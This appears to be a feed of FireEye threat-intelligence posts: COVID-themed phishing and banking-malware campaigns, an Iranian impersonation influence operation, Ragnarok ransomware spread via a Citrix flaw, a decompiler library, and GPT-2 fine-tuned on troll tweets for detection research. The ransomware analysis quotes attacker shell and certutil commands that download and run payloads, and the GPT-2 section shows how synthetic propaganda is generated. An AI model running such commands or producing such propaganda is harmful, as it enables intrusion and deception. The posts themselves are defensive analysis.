I’ve shared the Code Grafting tools as part of the flare-ida GitHub repository. To use this for your own analyses:

  1. In IDA Pro’s IDAPython prompt, run code_grafter.py or import it as a module.
  2. Instantiate a CodeGrafter object and invoke its graftCodeToIdb() method:
    • CodeGrafter().graftCodeToIdb()
  3. Use Bochs in IDB mode to conveniently execute your modified sample and experiment away!

This post makes it clear just how far I’ll go to avoid breaking eye contact with IDA. If you’re a fan of using Bochs with IDA too, then this is my gift to you. Enjoy!

Social Engineering Based on Stimulus Bill and COVID-19 Financial Compensation Schemes Expected to Grow in Coming Weeks

Given the community interest and media coverage surrounding the economic stimulus bill currently being considered by the United States House of Representatives, we anticipate attackers will increasingly leverage lures tailored to the new stimulus bill and related recovery efforts such as stimulus checks, unemployment compensation and small business loans. Although campaigns employing themes relevant to these matters are only beginning to be adopted by threat actors, we expect future campaigns—primarily those perpetrated by financially motivated threat actors—to incorporate these themes in proportion to the media’s coverage of these topics.

Threat actors with varying motivations are actively exploiting the current pandemic and public fear of the coronavirus and COVID-19. This is consistent with our expectations; malicious actors are typically quick to adapt their social engineering lures to exploit major flashpoints along with other recurrent events (e.g. holidays, Olympics). Security researchers at FireEye and in the broader community have already begun to identify and report on COVID-19 themed campaigns with grant, payment, or economic recovered themed emails and attachments.

Example Malware Distribution Campaign

On March 18, individuals at corporations across a broad set of industries and geographies received emails with the subject line “COVID-19 Payment” intended to distribute the SILENTNIGHT banking malware (also referred to by others as Zloader). Despite the campaign’s broad distribution, a plurality of associated messages were sent to organizations based in Canada. Interestingly, although the content of these emails was somewhat generic, they were sometimes customized to reference a payment made in currency relevant to the recipient’s geography and contextually relevant government officials (Figure 1 and Figure 2). These emails were sent from a large pool of different @gmx.com email addresses and had password protected Microsoft Word document attachments using the file name “COVID 19 Relief.doc” (Figure 3). The emails appear to be auto generated and follow the format <name>.<name><SevenNumberString>@gmx.com. When these documents were opened and macros enabled, they would drop and execute a .JSE script crafted to download and execute an instance of SILENTNIGHT from http://209.141.54[.]161/crypt18.dll.

An analyzed sample of SILENTNIGHT downloaded from this URL had an MD5 hash of 9e616a1757cf1d40689f34d867dd742e, employed the RC4 key 'q23Cud3xsNf3', and was associated with the SILENTNIGHT botnet 'PLSPAM'. This botnet has been seen loading configuration files containing primarily U.S.- and Canada financial institution webinject targets. Furthermore, this sample was configured to connect to the following controller infrastructure:

  • http://marchadvertisingnetwork4[.]com/post.php
  • http://marchadvertisingnetwork5[.]com/post.php
  • http://marchadvertisingnetwork6[.]com/post.php
  • http://marchadvertisingnetwork7[.]com/post.php
  • http://marchadvertisingnetwork8[.]com/post.php
  • http://marchadvertisingnetwork9[.]com/post.php
  • http://marchadvertisingnetwork10[.]com/post.php


Figure 1: Example lure using CAD


Figure 2: Example lure using AUD


Figure 3: Malicious Word document

Example Phishing Campaign

Individuals at financial services organizations in the United States were sent emails with the subject line “Internal Guidance for Businesses Grant and loans in response to respond to COVID-19” (Figure 4). These emails had OpenDocument Presentation (.ODP) format attachments that, when opened in Microsoft PowerPoint or OpenOffice Impress, display a U.S. Small Business Administration (SBA) themed message (Figure 5) and an in-line link that redirects to an Office 365 phishing kit (Figure 6) hosted at https://tyuy56df-kind-giraffe-ok.mybluemix[.]net/.


Figure 4: Email lure referencing business grants and loans


Figure 5: SBA-themed message


Figure 6: Office 365 phishing page

Implications

Malicious actors have always exploited users’ sense of urgency, fear, goodwill and mistrust to enhance their operations. The threat actors exploiting this crisis are not new, they are simply taking advantage of a particularly overtaxed target set that is urgently seeking new information. Users who are aware of this dynamic, and who approach any new information with cautious skepticism will be especially prepared to meet this challenge.

"Distinguished Impersonator" Information Operation That Previously Impersonated U.S. Politicians and Journalists on Social Media Leverages Fabricated U.S. Liberal Personas to Promote Iranian Interests

12 February 2020 at 12:30

In May 2019, FireEye Threat Intelligence published a blog post exposing a network of English-language social media accounts that engaged in inauthentic behavior and misrepresentation that we assessed with low confidence was organized in support of Iranian political interests. Personas in that network impersonated candidates for U.S. House of Representatives seats in 2018 and leveraged fabricated journalist personas to solicit various individuals, including real journalists and politicians, for interviews intended to bolster desired political narratives. Since the release of that blog post, we have continued to track activity that we believe to be part of that broader operation, reporting our findings to our intelligence customers using the moniker “Distinguished Impersonator.”

Today, Facebook took action against a set of eleven accounts on the Facebook and Instagram platforms that they shared with us and, upon our independent review, we assessed were related to the broader Distinguished Impersonator activity set we’ve been tracking. We separately identified a larger set of just under 40 related accounts active on Twitter against which Twitter has also taken recent enforcement action. In this blog post, we provide insights into the recent activity and behavior of some of the personas in the Distinguished Impersonator network, in order to exemplify the tactics information operations actors are employing in their attempts to surreptitiously amplify narratives and shape political attitudes.          

Activity Overview

Personas in the Distinguished Impersonator network have continued to engage in activity similar to that we previously reported on publicly in May 2019, including social media messaging directed at politicians and media outlets; soliciting prominent individuals including academics, journalists, and activists for “media” interviews; and posting what appear to be videoclips of interviews of unknown provenance conducted with such individuals to social media. The network has also leveraged authentic media content to promote desired political narratives, including the dissemination of news articles and videoclips from Western mainstream media outlets that happen to align with Iranian interests, and has amplified the commentary of real individuals on social media.

Outside of impersonating prominent individuals such as journalists, other personas in the network have primarily posed as U.S. liberals, amplifying authentic content from other social media users broadly in line with that proclaimed political leaning, as well as material more directly in line with Iranian political interests, such as videoclips of a friendly meeting between U.S. President Trump and Crown Prince of Saudi Arabia Mohammad Bin Salman accompanied by pro-U.S. Democrat commentary, videoclips of U.S. Democratic presidential candidates discussing Saudi Arabia's role in the conflict in Yemen, and other anti-Saudi, anti-Israeli, and anti-Trump messaging. Some of this messaging has been directed at the social media accounts of U.S. politicians and media outlets (Figure 1).


Figure 1: Twitter accounts in the Distinguished Impersonator network posting anti-Israeli, anti-Saudi, and anti-Trump content

We observed direct overlap between six of the personas operating on Facebook platforms and those operating on Twitter. In one example of such overlap, the “Ryan Jensen” persona posted to both Twitter and Instagram a videoclip showing antiwar protests in the U.S. following the killing of Qasem Soleimani, commander of the Islamic Revolutionary Guards Corps’ Quds Force (IRGC-QF) by a U.S. airstrike in Baghdad in January 2020 (Figure 2). Notably, though the strike motivated some limited activity by personas in the network, the Distinguished Impersonator operation has been active since long before that incident.


Figure 2: Posts by the “Ryan Jensen” persona on Twitter and Instagram disseminating a videoclip of antiwar protests in the U.S. following the killing of Qasem Soleimani

Accounts Engaged in Concerted Replies to Influential Individuals on Twitter, Posed as Journalists and Solicited Prominent Individuals for “Media” Interviews

Personas on Twitter that we assess to be a part of the Distinguished Impersonator operation engaged in concerted replies to tweets by influential individuals and organizations, including members of the U.S. Congress and other prominent political figures, journalists, and media outlets. The personas responded to tweets with specific narratives aligned with Iranian interests, often using identical hashtags. The personas sometimes also responded with content unrelated to the tweet they were replying to, again with messaging aligned with Iranian interests. For example, a tweet regarding a NASA mission received replies from personas in the network pertaining to Iran’s seizure of a British oil tanker in July 2019. Other topics the personas addressed included U.S.-imposed sanctions on Iran and U.S. President Trump’s impeachment (Figure 3). While it is possible that the personas may have conducted such activity in the hope of eliciting responses from the specific individuals and organizations they were replying to, the multiple instances of personas responding to seemingly random tweets with unrelated political content could also indicate an intent to reach the broader Twitter audiences following those prominent accounts.


Figure 3: Twitter accounts addressing U.S.-imposed sanctions on Iran (left) and the Trump impeachment (right)

Instagram accounts that we assess to be part of the Distinguished Impersonator operation subsequently highlighted this Twitter activity by posting screen recordings of an unknown individual(s) scrolling through the responses by the personas and authentic Twitter users to prominent figures’ tweets. The Instagram account @ryanjensen7722, for example, posted a video scrolling through replies to a tweet by U.S. Senator Cory Gardner commenting on “censorship and oppression.” The video included a reply posted by @EmilyAn1996, a Twitter account we have assessed to be part of the operation, discussing potential evidence surrounding President Trump’s impeachment trial.


Figure 4: Screenshot of video posted by @ryanjensen7722 on Instagram scrolling through Twitter replies to a tweet by U.S. Senator Cory Gardner

We also observed at least two personas posing as journalists working at legitimate U.S. media outlets openly solicit prominent individuals via Twitter, including Western academics, activists, journalists, and political advisors, for interviews (Figure 5). These individuals included academic figures from organizations such as the Washington Institute for Near East Policy and the Foreign Policy Research Institute, as well as well-known U.S. conservatives opposed to U.S. President Trump and a British MP. The personas solicited the individuals’ opinions regarding topics relevant to Iran’s political interests, such as Trump’s 2020 presidential campaign, the Trump administration’s relationship with Saudi Arabia, Trump’s “deal of the century,” referring to a peace proposal regarding the Israeli-Palestinian conflict authored by the Trump administration, and a tweet by President Trump regarding former UK Prime Minister Theresa May.


Figure 5: The “James Walker” persona openly soliciting interviews from academics and journalists on Twitter

Twitter Personas Posted Opinion Polls To Solicit Views on Topics Relevant to Iranian Political Interests

Some of the personas on Twitter also posted opinion polls to solicit other users’ views on political topics, possibly for the purpose of helping to build a larger follower base through engagement. One account, @CavenessJim, posed the question: “Do you believe in Trump’s foreign policies especially what he wants to do for Israel which is called ‘the deal of the century’?” (The poll provided two options: “Yes, I do.” and “No, he cares about himself.” Of the 2,241 votes received, 99% of participants voted for the latter option, though we note that we have no visibility into the authenticity of those “voters”.) Another account, @AshleyJones524, responded to a tweet by U.S. Senator Lindsey Graham by posting a poll asking if the senator was “Trump’s lapdog,” tagging seven prominent U.S. politicians and one comedian in the post; all 24 respondents to the poll voted in the affirmative. As with the Instagram accounts’ showcasing of replies to the tweets of prominent individuals, Instagram accounts in the network also highlighted polls posted by the personas on Twitter (Figure 6).


Figure 6: Twitter account @CavenessJim posts Twitter poll (left); Instagram account @ryanjensen7722 posts video highlighting @CavenessJim's Twitter poll (right)

Videoclips of Interviews with U.S., U.K., and Israeli Individuals Posted on Iran-Based Media Outlet Tehran Times

Similar to the personas we reported on in May 2019, some of the more recently active personas posted videoclips on Facebook, Instagram, and Twitter of interviews with U.S., UK, and Israeli individuals including professors, politicians, and activists expressing views on topics aligned with Iranian political interests (Figure 7). We have thus far been unable to determine the provenance of these interviews, and note that, unlike some of the previous cases we reported on in 2019, the personas in this more recent iteration of activity did not themselves proclaim to have conducted the interviews they promoted on social media. The videoclips highlighted the interviewees’ views on issues such as U.S. foreign policy in the Middle East and U.S. relations with its political allies. Notably, we observed that at least some of the videoclips that were posted by the personas to social media have also appeared on the website of the Iranian English-language media outlet Tehran Times, both prior to and following the personas' social media posts. In other instances, Tehran Times published videoclips that appeared to be different segments of the same interviews that were posted by Distinguished Impersonator personas. Tehran Times is owned by the Islamic Propagation Organization, an entity that falls under the supervision of the Iranian Supreme Leader Ali Khamenei.


Figure 7: Facebook and Instagram accounts in the network posting videoclips of interviews with an activist and a professor

Conclusion

The activity we’ve detailed here does not, in our assessment, constitute a new activity set, but rather a continuation of an ongoing operation we believe is being conducted in support of Iranian political interests that we’ve been tracking since last year. It illustrates that the actors behind this operation continue to explore elaborate methods for leveraging the authentic political commentary of real individuals to furtively promote Iranian political interests online. The continued impersonation of journalists and the amplification of politically-themed interviews of prominent individuals also provide additional examples of what we have long referred to internally as the “media-IO nexus”, whereby actors engaging in online information operations actively leverage the credibility of the legitimate media environment to mask their activities, whether that be through the use of inauthentic news sites masquerading as legitimate media entities, deceiving legitimate media entities in order to promote desired political narratives, defacing media outlets’ websites to disseminate disinformation, spoofing legitimate media websites, or, as in this case, attempting to solicit commentary likely perceived as expedient to the actors’ political goals by adopting fake media personas.

Nice Try: 501 (Ransomware) Not Implemented

24 January 2020 at 17:00

An Ever-Evolving Threat

Since January 10, 2020, FireEye has tracked extensive global exploitation of CVE-2019-19781, which continues to impact Citrix ADC and Gateway instances that are unpatched or do not have mitigations applied. We previously reported on attackers’ swift attempts to exploit this vulnerability and the post-compromise deployment of the previously unseen NOTROBIN malware family by one threat actor. FireEye continues to actively track multiple clusters of activity associated with exploitation of this vulnerability, primarily based on how attackers interact with vulnerable Citrix ADC and Gateway instances after identification.

While most of the CVE-2019-19781 exploitation activity we’ve observed to this point has led to the deployment of coin miners or most commonly NOTROBIN, recent compromises suggest that this vulnerability is also being exploited to deploy ransomware. If your organization is attempting to assess whether there is evidence of compromise related to exploitation of CVE-2019-19781, we highly encourage you to use the IOC Scanner co-published by FireEye and Citrix, which detects the activity described in this post.

Between January 16 and 17, 2020, FireEye Managed Defense detected the IP address 45[.]120[.]53[.]214 attempting to exploit CVE-2019-19781 at dozens of FireEye clients. When successfully exploited, we observed impacted systems executing the cURL command to download a shell script with the file name ld.sh from 45[.]120[.]53[.]214 (Figure 1). In some cases this same shell script was instead downloaded from hxxp://198.44.227[.]126:81/citrix/ld.sh.


Figure 1: Snippet of ld.sh, downloaded from 45.120.53.214

The shell script, provided in Figure 2, searches for the python2 binary (Note: Python is only pre-installed on Citrix Gateway 12.x and 13.x systems) and downloads two additional files to the system: piz.Lan, a XOR-encoded data blob, and de.py, a Python script, to a temporary directory. This script then changes permissions and executes de.py, which subsequently decodes and decompresses piz.Lan. Finally, the script cleans up the initial staging files and executes scan.py, an additional script we will cover in more detail later in the post.

#!/bin/sh
rm $0
if [ ! -f "/var/python/bin/python2" ]; then
echo 'Exit'
exit
fi

mkdir /tmp/rAgn
cd /tmp/rAgn

curl hxxp://45[.]120[.]53[.]214/piz.Lan -o piz.Lan
sleep 1
curl hxxp://45[.]120[.]53[.]214/de -o de.py
chmod 777 de.py
/var/python/bin/python2 de.py

rm de.py
rm piz.Lan
rm .new.zip
cd httpd
/var/python/bin/python2 scan.py -n 50 -N 40 &

Figure 2: Contents of ld.sh, a shell-script to download additional tools to the compromised system

piz.Lan -> .net.zip

Armed with the information gathered from de.py, we turned our attention to decoding and decompressing “.net.zip” (MD5: 0caf9be8fd7ba5b605b7a7b315ef17a0). Inside, we recovered five files, represented in Table 1:

Filename

Functionality

MD5

x86.dll

32-bit Downloader

9aa67d856e584b4eefc4791d2634476a

x64.dll

64-bit Downloader

55b40e0068429fbbb16f2113d6842ed2

scan.py

Python socket scanner

b0acb27273563a5a2a5f71165606808c

xp_eternalblue.replay

Exploit replay file

6cf1857e569432fcfc8e506c8b0db635

eternalblue.replay

Exploit replay file

9e408d947ceba27259e2a9a5c71a75a8

Table 1: Contents of the ZIP file ".new.zip", created by the script de.py

The contents of the ZIP were explained via analysis of the file scan.py, a Python scanning script that would also automate exploitation of identified vulnerable system(s). Our initial analysis showed that this script was a combination of functions from multiple open source projects or scripts. As one example, the replay files, which were either adapted or copied directly from this public GitHub repository, were present in the Install_Backdoor function, as shown in Figure 3:


Figure 3: Snippet of scan.py showing usage of EternalBlue replay files

This script also had multiple functions checking whether an identified system is 32- vs. 64-bit, as well as raw shell code to step through an exploit. The exploit_main function, when called, would appropriately choose between 32- or 64-bit and select the right DLL for injection, as shown in Figure 4.


Figure 4: Snippet of scan.py showing instructions to deploy 32- or 64-bit downloaders

I Call Myself Ragnarok

Our analysis continued by examining the capabilities of the 32- and 64-bit DLLs, aptly named x86.dll and x64.dll. At only 5,120 bytes each, these binaries performed the following tasks (Figure 5 and Figure 6):

  1. Download a file named patch32 or patch64 (respective to operating system bit-ness) from a hard-coded URL using certutil, a native tool used as part of Windows Certificate Services (categorized as Technique 11005 within MITRE’s ATT&CK framework).
  2. Execute the downloaded binary since1969.exe, located in C:\Users\Public.
  3. Delete the URL from the current user’s certificate cache.
certutil.exe -urlcache -split -f hxxp://45.120.53[.]214/patch32 C:/Users/Public/since1969.exe
cmd.exe /c C:/Users/Public/since1969.exe
certutil -urlcache -f hxxp://45.120.53[.]214/patch32 delete

Figure 5: Snippet of strings from x86.dll

certutil.exe -urlcache -split -f hxxp://45.120.53[.]214/patch64 C:/Users/Public/since1969.exe
cmd.exe /c C:/Users/Public/since1969.exe
certutil -urlcache -f hxxp://45.120.53[.]214/patch64 delete

Figure 6: Snippet of strings from x64.dll

Although neither patch32 nor patch64 were available at the time of analysis, FireEye identified a file on VirusTotal with the name avpass.exe (MD5: e345c861058a18510e7c4bb616e3fd9f) linked to the IP address 45[.]120[.]53[.]214 (Figure 8). This file is an instance of the publicly available Meterpreter backdoor that was uploaded on November 12, 2019. Additional analysis confirmed that this binary communicated to 45[.]120[.]53[.]214 over TCP port 1234.


Figure 7: VirusTotal graph showing links between resources hosted on or communicating with 45.120.53.214

Within the avpass.exe binary, we found an interesting PDB string that provided more context about the tool’s author: “C:\Users\ragnarok\source\repos\avpass\Debug\avpass.pdb”. Utilizing ragnarok as a keyword, we pivoted and were able to identify a separate copy of since1969.exe (MD5: 48452dd2506831d0b340e45b08799623) uploaded to VirusTotal on January 23, 2020. The binary’s compilation timestamp of January 16, 2020, aligns with our earliest detections associated with this threat actor.

Further analysis and sandboxing of this binary brought all the pieces together—this threat actor may have been attempting to deploy ransomware aptly named ‘Ragnarok’. We’d like to give credit to this Tweet from Karsten Hahn, who identified ragnarok-related about artifacts on January 17, 2020, again aligning with the timeframe of our initial detection. Figure 8 provides a snippet of files created by the binary upon execution.


Figure 8: Ragnarok-related ransomware files

The ransom note dropped by this ransomware, shown in Figure 11, points to three email addresses.

6.it's wise to pay as soon as possible it wont make you more losses

the ransome: 1 btcoin for per machine,5 bitcoins for all machines

how to buy bitcoin and transfer? i think you are very good at googlesearch

[email protected][.]com
[email protected][.]com
[email protected][.]com

Attention:if you wont pay the ransom in five days, all of your files will be made public on internet and will be deleted

Figure 9: Snippet of ransom note dropped by “since1969.exe”

Implications

FireEye continues to observe multiple actors who are currently seeking to take advantage of CVE-2019-19781. This post outlines one threat actor who is using multiple exploits to take advantage of vulnerable internal systems and move laterally inside the organization. Based on our initial observations, the ultimate intent may have been the deployment of ransomware, using the Gateway as a central pivot point.

As previously mentioned, if suspect your Citrix appliances may have been compromised, we recommend utilizing the tool FireEye released in partnership with Citrix.

Detect the Technique

Aside from CVE-2019-19781, FireEye detects the activity described in this post across our platforms, including named detections for Meterpreter, and EternalBlue. Table 2 contains several specific detection names to assist in detection of this activity.

Signature Name

CERTUTIL.EXE DOWNLOADER (UTILITY)

CURL Downloading Shell Script

ETERNALBLUE EXPLOIT

METERPRETER (Backdoor)

METERPRETER URI (STAGER)

SMB - ETERNALBLUE

Table 2: FireEye Detections for activity described in this post

Indicators

Table 3 provides the unique indicators discussed in this post.

Indicator Type

Indicator

Notes

Network

45[.]120[.]53[.]214

 

Network

198[.]44[.]227[.]126

 

Host

91dd06f49b09a2242d4085703599b7a7

piz.Lan

Host

01af5ad23a282d0fd40597c1024307ca

de.py

Host

bd977d9d2b68dd9b12a3878edd192319

ld.sh

Host

0caf9be8fd7ba5b605b7a7b315ef17a0

.new.zip

Host

9aa67d856e584b4eefc4791d2634476a

x86.dll

Host

55b40e0068429fbbb16f2113d6842ed2

x64.dll

Host

b0acb27273563a5a2a5f71165606808c

scan.py

Host

6cf1857e569432fcfc8e506c8b0db635

xp_eternalblue.replay

Host

9e408d947ceba27259e2a9a5c71a75a8

eternalblue.replay

Host

e345c861058a18510e7c4bb616e3fd9f

avpass.exe

Host

48452dd2506831d0b340e45b08799623

since1969.exe

Email Address

[email protected][.]com

From ransom note

Email Address

[email protected][.]com

From ransom note

Email Address

[email protected][.]com

From ransom note

Table 3: Collection of IOCs from this blog post

FIDL: FLARE’s IDA Decompiler Library

25 November 2019 at 20:00

IDA Pro and the Hex Rays decompiler are a core part of any toolkit for reverse engineering and vulnerability research. In a previous blog post we discussed how the Hex-Rays API can be used to solve small, well-defined problems commonly seen as part of malware analysis. Having access to a higher-level representation of binary code makes the Hex-Rays decompiler a powerful tool for reverse engineering. However, interacting with the HexRays API and its underlying data sources can be daunting, making the creation of generic analysis scripts difficult or tedious.

This blog post introduces the FLARE IDA Decompiler Library (FIDL), FireEye’s open source library which provides a wrapper layer around the Hex-Rays API.

Background

Output from the Hex-Rays decompiler is exposed to analysts via an Abstract Syntax Tree (AST). Out of the box, processing a binary using the Hex-Rays API means iterating this AST using a tree visitor class which visits each node in the tree and issues a callback.  For every callback we can check to see what kind of node we are visiting (calls, additions, assignments, etc.) and then process that node. For more information on these constructs see our previous blog post.

The Problem

While powerful, this workflow can be difficult to use when creating a generic API for several reasons:

  • The order nodes are visited in, is not always obvious based on the decompiler output
  • When visiting a node, we have no context about where we are in the AST
  • Any problem which requires multiple steps requires multiple visitors or complicated logic in our callback function
  • The amount of cases to handle when walking up or down the AST can increase exponentially

Handling each of these cases in a single visitor callback function is untenable, so we need a way to more flexibly interact with the decompiler.

FIDL

FIDL, the FLARE IDA Decompiler Library, is our implementation of a wrapper around the Hex-Rays API. FIDL’s main goal is to abstract away the lower level details of the default decompiler API. FIDL solves multiple problems:

  • Provides analysts an easy-to-understand API layer which can be used to write more complicated binary processing scripts
  • Abstracts away the minutiae of processing the AST
  • Provides helper implementations for commonly needed functionality when working with the decompiler
  • Provides documented examples on how to use various Hex-Rays APIs

Many of FIDL’s benefits are exposed to users via the controlFlowinator class. When constructing this object FIDL will parse the AST for us and provides a high-level summary of a function using information extracted via the decompiler including APIs called, their parameters, and a summary of local variables and parameters for the function.

Figure 1 shows a subset of information available via a controlFlowinator next to the decompilation of the function.


Figure 1: Sample output available as part of a controlFlowinator

When parsing the AST during construction, the controlFlowinator also combines nodes representing the same logical expression into a more digestible form where each block translates roughly to one line of pseudocode. Figure 2 and Figure 3 show the AST and controlFlowinator representations of the same function.


Figure 2: The default rendering of the AST of a function


Figure 3: The control flow graph created by the controlFlowinator for the function shown in Figure 2

Compared to the default AST, this graph is organized by potential code paths that can be taken through a function. This gives analysts a much more logical structure to iterate when trying to determine context for a particular expression.

Readily available access to variables and API calls used in a function makes creating scripts to leverage the Hex-Rays API much more straightforward. In our previous blog post we introduced a script which uses the HexRays API to rename global variables based on the parameter to GetProcAddress. Figure 4 shows this script rewritten using the FIDL API. This new script is both easier to understand and does not rely on manually walking the AST.


Figure 4: Script that uses the FIDL API to map all calls to GetProcAddress to global variables

Rather than calling GetProcAddress malware commonly manually revolves needed imports by walking the Export Address Table (EAT) and comparing the hashes of a DLL’s exports looking for pre-computed values. As an analyst being able to quickly or automatically map these functions to their intended API makes it easier for us to identify which functions we should spend time analyzing. Figure 5 shows an example of how FIDL can be used to handle these cases. This script targets a DRIDEX sample with MD5 hash 7B82CF2CF9D08191C6828C3F62A2F914. This binary uses CRC32 with an XOR key of 0x65C54023 as the hashing algorithm during import resolution.


Figure 5: IDAPython script to automatically process and markup a DRIDEX sample

Running the above script results in output similar to what is shown in Figure 6, with comments labeling which functions are resolved.


Figure 6: The script in Figure 5 inserts comments into the decompiler output annotating decrypted strings

You can find FIDL in the FireEye GitHub repository.

Conclusion

While the Hex-Rays decompiler is a powerful source of information during reverse engineering, writing generic scripts and plugins using the default API is difficult and requires handling numerous edge cases. This post introduced the FIDL library, a wrapper around the Hex-Rays API, which fixes this by reducing the amount of low-level details an analyst needs to understand in order to create a script leveraging the decompiler and should make the creation of these scripts much faster. In future blog posts we will publish more scripts and analysis utilizing this library.

Attention is All They Need: Combatting Social Media Information Operations With Neural Language Models

14 November 2019 at 17:00

Information operations have flourished on social media in part because they can be conducted cheaply, are relatively low risk, have immediate global reach, and can exploit the type of viral amplification incentivized by platforms. Using networks of coordinated accounts, social media-driven information operations disseminate and amplify content designed to promote specific political narratives, manipulate public opinion, foment discord, or achieve strategic ideological or geopolitical objectives. FireEye’s recent public reporting illustrates the continually evolving use of social media as a vehicle for this activity, highlighting information operations supporting Iranian political interests such as one that leveraged a network of inauthentic news sites and social media accounts and another that impersonated real individuals and leveraged legitimate news outlets.

Identifying sophisticated activity of this nature often requires the subject matter expertise of human analysts. After all, such content is purposefully and convincingly manufactured to imitate authentic online activity, making it difficult for casual observers to properly verify. The actors behind such operations are not transparent about their affiliations, often undertaking concerted efforts to mask their origins through elaborate false personas and the adoption of other operational security measures. With these operations being intentionally designed to deceive humans, can we turn towards automation to help us understand and detect this growing threat? Can we make it easier for analysts to discover and investigate this activity despite the heterogeneity, high traffic, and sheer scale of social media?

In this blog post, we will illustrate an example of how the FireEye Data Science (FDS) team works together with FireEye’s Information Operations Analysis team to better understand and detect social media information operations using neural language models.

Highlights

  • A new breed of deep neural networks uses an attention mechanism to home in on patterns within text, allowing us to better analyze the linguistic fingerprints and semantic stylings of information operations using modern Transformer models.
  • By fine-tuning an open source Transformer known as GPT-2, we can detect social media posts being leveraged in information operations despite their syntactic differences to the model’s original training data.
  • Transfer learning from pre-trained neural language models lowers the barrier to entry for generating high-quality synthetic text at scale, and this has implications for the future of both red and blue team operations as such models become increasingly commoditized.

Background: Using GPT-2 for Transfer Learning

OpenAI’s updated Generative Pre-trained Transformer (GPT-2) is an open source deep neural network that was trained in an unsupervised manner on the causal language modeling task. The objective of this language modeling task is to predict the next word in a sentence from previous context, meaning that a trained model ends up being capable of language generation. If the model can predict the next word accurately, it can be used in turn to predict the following word, and then so on and so forth until eventually, the model produces fully coherent sentences and paragraphs. Figure 1 depicts an example of language model (LM) predictions we generated using GPT-2. To generate text, single words are successively sampled from distributions of candidate words predicted by the model until it predicts an <|endoftext|> word, which signals the end of the generation.


Figure 1: An example GPT-2 generation prior to fine-tuning after priming the model with the phrase “It’s disgraceful that.”  

The quality of this synthetically generated text along with GPT-2’s state of the art accuracy on a host of other natural language processing (NLP) benchmark tasks is due in large part to the model’s improvements over prior 1) neural network architectures and 2) approaches to representing text. GPT-2 uses an attention mechanism to selectively focus the model on relevant pieces of text sequences and identify relationships between positionally distant words. In terms of architectures, Transformers use attention to decrease the time required to train on enormous datasets; they also tend to model lengthy text and scale better than other competing feedforward and recurrent neural networks. In terms of representing text, word embeddings were a popular way to initialize just the first layer of neural networks, but such shallow representations required being trained from scratch for each new NLP task and in order to deal with new vocabulary. GPT-2 instead pre-trains all the model’s layers using hierarchical representations, which better capture language semantics and are readily transferable to other NLP tasks and new vocabulary.

This transfer learning method is advantageous because it allows us to avoid starting from scratch for each and every new NLP task. In transfer learning, we start from a large generic model that has been pre-trained for an initial task where copious data is available. We then leverage the model’s acquired knowledge to train it further on a different, smaller dataset so that it excels at a subsequent, related task. This process of training the model further is referred to as fine-tuning, which involves re-learning portions of the model by adjusting its underlying parameters. Fine-tuning not only requires less data compared to training from scratch, but typically also requires less compute time and resources.

In this blog post, we will show how to perform transfer learning from a pre-trained GPT-2 model in order to better understand and detect information operations on social media. Transformers have shown that Attention is All You Need, but here we will also show that Attention is All They Need: while transfer learning may allow us to more easily detect information operations activity, it likewise lowers the barrier to entry for actors seeking to engage in this activity at scale.

Understanding Information Operations Activity Using Fine-Tuned Neural Generations

In order to study the thematic and linguistic characteristics of a common type of social media-driven information operations activity, we first fine-tuned an LM that could perform text generation. Since the pre-trained GPT-2 model's dataset consisted of 40+ GB of Internet text data extracted from 8+ million reputable web pages, its generations display relatively formal grammar, punctuation, and structure that corresponds to the text present within that original dataset (e.g. Figure 1). To make it appear like social media posts with their shorter length, informal grammar, erratic punctuation, and syntactic quirks including @mentions, #hashtags, emojis, acronyms, and abbreviations, we fine-tuned the pre-trained GPT-2 model on a new language modeling task using additional training data.

For the set of experiments presented in this blog post, this additional training data was obtained from the following open source datasets of identified accounts operated by Russia’s famed Internet Research Agency (IRA) “troll factory”:

  • NBCNews, over 200,000 tweets posted between 2014 and 2017 tied to IRA “malicious activity.”
  • FiveThirtyEight, over 1.8 million tweets associated with IRA activity between 2012 and 2018; we used accounts categorized as Left Troll, Right Troll, or Fearmonger.
  • Twitter Elections Integrity, almost 3 million tweets that were part of the influence effort by the IRA around the 2016 U.S. presidential election.
  • Reddit Suspicious Accounts, consisting of comments and submissions emanating from 944 accounts of suspected IRA origin.

After combining these four datasets, we sampled English-language social media posts from them to use as input for our fine-tuned LM. Fine-tuning experiments were carried out in PyTorch using the 355 million parameter pre-trained GPT-2 model from HuggingFace’s transformers library, and were distributed over up to 8 GPUs.

As opposed to other pre-trained LMs, GPT-2 conveniently requires minimal architectural changes and parameter updates in order to be fine-tuned on new downstream tasks. We simply processed social media posts from the above datasets through the pre-trained model, whose activations were then fed through adjustable weights into a linear output layer. The fine-tuning objective here was the same that GPT-2 was originally trained on (i.e. the language modeling task of predicting the next word, see Figure 1), except now its training dataset included text from social media posts. We also added the <|endoftext|> string as a suffix to each post to adapt the model to the shorter length of social media text, meaning posts were fed into the model according to:

“#Fukushima2015 Zaporozhia NPP can explode at any time
and that's awful! OMG! No way! #Nukraine<|endoftext|>”

Figure 2 depicts a few example generations made after fine-tuning GPT-2 on the IRA datasets. Observe how these text generations are formatted like something we might expect to encounter scrolling through social media – they are short yet biting, express certainty and outrage regarding political issues, and contain emphases like an exclamation point. They also contain idiosyncrasies like hashtags and emojis that positionally manifest at the end of the generated text, depicting a semantic style regularly exhibited by actual users.


Figure 2: Fine-tuning GPT-2 using the IRA datasets for the language modeling task. Example generations are primed with the same phrase from Figure 1, “It’s disgraceful that.” Hyphens are added for readability and not produced by the model.

How does the model produce such credible generations? Besides the weights that were adjusted during LM fine-tuning, some of the heavy lifting is also done by the underlying attention scores that were learned by GPT-2’s Transformer. Attention scores are computed between all words in a text sequence, and represent how important one word is when determining how important its nearby words will be in the next learning iteration. To compute attention scores, the Transformer performs a dot product between a Query vector q and a Key vector k:

  • q encodes the current hidden state, representing the word that searches for other words in the sequence to pay attention to that may help supply context for it.
  • k encodes the previous hidden states, representing the other words that receive attention from the query word and might contribute a better representation for it in its current context.

Figure 3 displays how this dot product is computed based on single neuron activations in q and k using an attention visualization tool called bertviz. Columns in Figure 3 trace the computation of attention scores from the highlighted word on the left, “America,” to the complete sequence of words on the right. For example, to decide to predict “#” following the word “America,” this part of the model focuses its attention on preceding words like “ban,” “Immigrants,” and “disgrace,” (note that the model has broken “Immigrants” into “Imm” and “igrants” because “Immigrants” is an uncommon word relative to its component word pieces within pre-trained GPT-2's original training dataset).  The element-wise product shows how individual elements in q and k contribute to the dot product, which encodes the relationship between each word and every other context-providing word as the network learns from new text sequences. The dot product is finally normalized by a softmax function that outputs attention scores to be fed into the next layer of the neural network.


